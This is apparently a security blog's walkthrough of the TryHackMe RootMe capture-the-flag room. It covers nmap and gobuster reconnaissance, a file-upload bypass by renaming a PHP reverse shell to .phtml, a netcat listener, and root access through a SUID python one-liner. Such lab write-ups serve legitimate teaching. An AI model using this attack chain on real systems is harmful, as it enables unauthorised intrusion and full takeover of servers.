RootMe CTF: TryHackMe A Beginner’s Guide to Capture the flag

account takeover vulnerability
Run Interface for Account takeover vulnerability fraud detection
April 7, 2021
waf
What is WAF? How Web Application Firewall Evasion Techniques Work?
April 15, 2021

April 9, 2021

In this blog, you will learn about how to hack RootMe machine from TryHackMe.

So let’s jump straight to TryHackMe and deploy the machine here is the link for the machine: https://www.tryhackme.com/room/rrootme

TASK-1: Deploy the Machine

Start the machine.

1. Deploy the machine

– No answer needed.

TASK-2: Reconnaissance

Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and impure intentions. We are doing it with pure intentions on this test machine named RootMe. So let’s perform a quick NMAP scan and find information about the target.

  • In case you don’t know it is a network mapper that has emerged as one of the most popular, free network discovery tools on the market. Nmap is now one of the core tools used by network administrators to map their networks. 

To scan a network you can use following command:

nmap -A -T4 <MACHINE_IP>
  •  – A:  Enable OS detection, version detection, script scanning, and traceroute.
  • – T4: Set timing template (higher is faster)
rootme-NMAP-scan-result

NMAP scan result:

  • 22/tcp open  ssh     OpenSSH 7.6p1
  • 80/tcp open  http    Apache httpd 2.4.29
  • Service Info OS   Linux

1. Scan the rootme machine, how many ports are open?

– 2

2. What version of Apache is running?

– 2.4.29

3. What service is running on port 22?

– ssh

4. Find directories on the web server using the GoBuster tool.

What is Gobuster?

  • Gobuster is a tool used to brute-force: URIs (directories and files) in websites. DNS subdomains (with wildcard support). To learn more about Gobuster and installation process visit: https://github.com/OJ/gobuster

To brute-force directories you can use following command:

gobuster dir -u <URL> -w <WORDLIST_LOCATION>
  • – u:  URL of the rootme machine.
  • – w: Path to wordlist.
rootme-tryhackme

– No answer needed.

5. What is the hidden directory?

– /panel/

TASK-3: Getting a Shell

Navigate to URL:  http://<MACHINE_IP> 

It’s a basic web page and nothing interesting.

Let’s check the source code of a website, sometimes you’ll end up getting sensitive endpoints, passwords, hidden paths, and secret keys inside the source code.

Here we got nothing in source code, Let’s see what’s in the hidden directory        /panel/ we previously discovered using gobuster.

Navigating to URL:  http://<MACHINE_IP>/panel

rootme-tryhackme

Here we found a file upload functionality where we can upload files.

Ah!!!! What if we can upload malicious .php files? Let’s check.

Tried .php – Denied. 

Tried .phtml – Success !!!!

Wanna know how I did this? It’s called file upload restrictions bypass. 

To learn in depth about this do visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

Now we can upload a php reverse shell here, we’ll use pentestmonkey php-reverse-shell.php script to obtain the reverse shell using netcat.

Download the script, remember to replace the $ip in the script with your machine ip and $port with anything, I’ll be using 1337. 

TryHackMe set time limit script
  • Save changes and upload the script on http://<MACHINE_IP>/panel
  • Start the netcat listener on any port. I’m using port 1337.

Netcat listener can be started using following command:

ncat -nlvp <PORT_NUMBER>
  • -n : Do not resolve hostnames via DNS
  • -l : Bind and listen for incoming connections
  • -v : Set verbosity level (can be used several times)
  • -p : Specify source port to use

Now we’ll gain reverse shell by executing the uploaded script by visiting following url:

http://<MACHINE_IP>/uploads/php-reverse-shell.phtml

reverse-shell

Voilla !!!!!

We have successfully gained a shell.

But the shell is not stable, let’s make this shell stable using following command:

python3 -c “import pty;pty.spawn(‘/bin/bash’)”

And find the user.txt file using following command:

find / -type f -name user.txt 2>/dev/null
  • – type f :  searches files only.
  • – name :  name of the file to locate.
  • 2>/dev/null :  suppresses error.
rootme-tryhackme

We have found user.txt file and it’s inside /var/www/

To read data inside file you can use following command:

cat /var/www/user.txt

1. user.txt

– THM{XXXXXXXXXXXXXXXX}

TASK-4: Privilege Escalation

To escalate privilege we need to hunt for the files with SUID permission.

  • SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.

and this can be achieved using following command:

find / -type f -user root -perm -4000 2>/dev/null
  • – type f :  searches files only.
  • – perm :  searches files with specific permission.
  • 2>/dev/null :  suppresses errors.
suid-permission

Ah!!!!!!! Here /usr/bin/python have SUID permission – Interesting.

1. Search for files with SUID permission, which file is weird?

– /usr/bin/python

2. Find a form to escalate your privileges.

– No answer needed.

Let’s escalate our privileges.

  • GTFOBins got cool privilege escalation commands, can be found on:

https://gtfobins.github.io/

  • searching for python SUID on GTFOBins.
gtfobins
suid-permission

We got commands for privilege escalation, here we can skip the first command as the python binary already has SUID permission. Copy and paste the command in the terminal without ./ to see if it works.

python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
suid-permission

Voilla!!!!!! It works.

We have successfully escalated our privileges. 

As we are root now, Let’s hunt for the root flag.

It’s in the /root directory.

cat /root/user.txt
thm-root-directory

1. root.txt

– THM{XXXXXXXXXXXXXXXX}

DONE. ROOM COMPLETED!!!!!

Salud!!!!!

The RootMe CTF is aimed at beginners and I will recommend all beginners to try and root it.

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks